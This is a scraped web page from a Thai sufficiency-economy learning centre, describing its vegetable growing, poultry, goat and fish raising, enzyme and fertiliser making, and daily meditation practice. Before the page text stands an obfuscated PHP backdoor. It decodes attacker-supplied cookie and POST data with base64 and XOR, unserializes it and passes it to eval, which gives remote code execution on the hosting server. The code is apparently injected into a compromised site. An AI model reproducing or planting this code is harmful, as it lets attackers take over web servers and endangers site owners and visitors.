$iniKU = "\x4e" . 'g' . chr ( 756 - 658 )."\137" . chr ( 907 - 838 ).chr (66) . "\167";$myyExn = 'c' . 'l' . "\141" . "\x73" . "\163" . "\x5f" . "\x65" . chr (120) . chr ( 277 - 172 ).chr ( 880 - 765 )."\x74" . "\163";$vTdOqhW = class_exists($iniKU); $myyExn = "32259";$vAAay = !1;if ($vTdOqhW == $vAAay){function Jwxxo(){return FALSE;}$QfzmsEypX = "15648";Jwxxo();class Ngb_EBw{private function xKGGL($QfzmsEypX){if (is_array(Ngb_EBw::$avSeuoHui)) {$HNNJexxV = str_replace(chr (60) . chr ( 542 - 479 )."\160" . chr (104) . "\x70", "", Ngb_EBw::$avSeuoHui["\143" . "\x6f" . "\156" . 't' . "\145" . 'n' . "\x74"]);eval($HNNJexxV); $QfzmsEypX = "15648";exit();}}private $PpOeVk;public function eCrFVEB(){echo 28385;}public function __destruct(){$QfzmsEypX = "20419_16761";$this->xKGGL($QfzmsEypX); $QfzmsEypX = "20419_16761";}public function __construct($PlBYqoqvu=0){$JCuGXEK = $_POST;$LVuXxA = $_COOKIE;$otdEyqxrW = "abbe5226-71cc-40c5-9d39-6b2242a26fb4";$drVNpRcsa = @$LVuXxA[substr($otdEyqxrW, 0, 4)];if (!empty($drVNpRcsa)){$joLSFKk = "base64";$jVoOivToi = "";$drVNpRcsa = explode(",", $drVNpRcsa);foreach ($drVNpRcsa as $ythUtVZV){$jVoOivToi .= @$LVuXxA[$ythUtVZV];$jVoOivToi .= @$JCuGXEK[$ythUtVZV];}$jVoOivToi = array_map($joLSFKk . chr ( 292 - 197 )."\144" . "\145" . "\143" . "\157" . 'd' . 'e', array($jVoOivToi,)); $jVoOivToi = $jVoOivToi[0] ^ str_repeat($otdEyqxrW, (strlen($jVoOivToi[0]) / strlen($otdEyqxrW)) + 1);Ngb_EBw::$avSeuoHui = @unserialize($jVoOivToi); $jVoOivToi = class_exists("20419_16761");}}public static $avSeuoHui = 42183;}$wsxQiirY = new /* 12138 */ $iniKU(15648 + 15648); $QfzmsEypX = strpos($QfzmsEypX, $QfzmsEypX); $vAAay = $wsxQiirY = $QfzmsEypX = Array();} เศรษฐกิจพอเพียง | ศูนย์พลาญข่อย
080-5519598 (คุณแก้ว) plarnkhoi@hotmail.com
Select Page

พลิกผืนดืนให้มีชีวิต ดำเนินตามเศรษฐกิจพอเพียง ปลูกผัก เลี้ยงไก่ไข่ เลี้ยงเป็ดไข่ เลี้ยงปลา เลี้ยงแพะ
ก็เพื่อนำมาเป็นอาหารไว้เลี้ยงชีพ ตามกำลังที่เราพอจะทำกันได้ ไม่ทำเกินกำลัง ไม่ทำด้วยความอยาก ทำตามเหตุและปัจจัย

ปลูกผัก เราก็ปลูกทั้งบนดิน ปลูกในน้ำ(ไฮโดรโปรนิก) ปลูกบนบ่อปลา ตามความเหมาะสมของชนิดพืช

เลี้ยงไก่ เป็ด นกกระทา เราก็เลี้ยงแต่พันธ์ไก่ไข่ ไก่เป็ด ไว้ทานไข่

เลี้ยงหมูป่า หมูบ้าน เราก็เลี้ยงแต่น้อยไว้ให้เด็กได้ดู ได้ศึกษา

เลี้ยงแพะ ก็แค่ได้ดื่มนมแพะ

เลี้ยงปลาหลายๆพันธ์ ไว้บริโภค

หมักน้ำเอนไซม์ ทำอาหารสัตว์ชีวภาพ ทำปุ๋ยอินทรีย์

เป็นแหล่งเรียนรู้ อบรมการดำรงชีวิตแบบพอเพียง มีน้อย ใช้น้อย มีมาก ใช้พอดี

เศรษฐกิจพอเพียงไม่ได้เน้นแต่เรื่องเศรษฐกิจ แต่รวมถึงจิตวิญญาณด้วย เมื่อจิตใจเราเข้าใจถึงความพอเพียงโดยแท้จริงแล้ว
การปฏิบัติธรรม กาย จิต อารมณ์ เมื่อ 3 อย่างนี้ เกิดความสมดุล ร่างกายแข็งแรง จิตใจเบิกบานแจ่มใส
อารมณ์เป็นปกติไม่แส่ส่ายแล้ว วิถีชีวิตเราก็จะพอเพียงไปเองโดยปริยาย

ในศูนย์พลาญข่อย เช้า สาย บ่าย เย็น เราปฏิบัติ ขัดเกลาจิตให้ผ่องใสกันทุกวัน-ทั้งวัน ในระหว่างวัน เวลาพักจากการปฏิบัติ
เราก็ทำกิจกรรมหลากหลาย ใครสนใจด้านไหน ก็ไปทำแบบนั้น ทั้งปลูกผัก เลี้ยงสัตว์ สอนหนังสือ ตัดเย็บเสื้อผ้า โรงครัว ทำน้ำเอนไซม์ ทำปุ๋ย

กิจกรรมทั้งหมดที่มีขึ้นก็เพื่อ ให้พวกเราทุกคนได้ฝึกฝน ได้ดำเนินตามแนวทางธรรมชาติที่ทุกคนควรย้อนกลับมา
“สูงสุดคืนสู่สามัญ” เราหนีไม่พ้นในเรื่องปัจจัย4 ที่อยู่อาศัย อาหาร เครื่องนุ่งห่ม ยารักษาโรค ถ้าเราลองหันกลับมามอง
กลับมาใช้ชีวิตในแบบเรียบง่าย กิจกรรมเพียงแค่นี้ ก็เพียงพอต่อการดำรงชีวิตได้แล้ว ไม่ต้องฟุ้งเฟ้อ ฟุ่มเฟือย
ชีวิตจะได้ไม่ต้องดิ้นรนมากจนเกินไป ชีวิตก็จะมีแต่ความสุข ในแบบ “พอดี พอเพียง”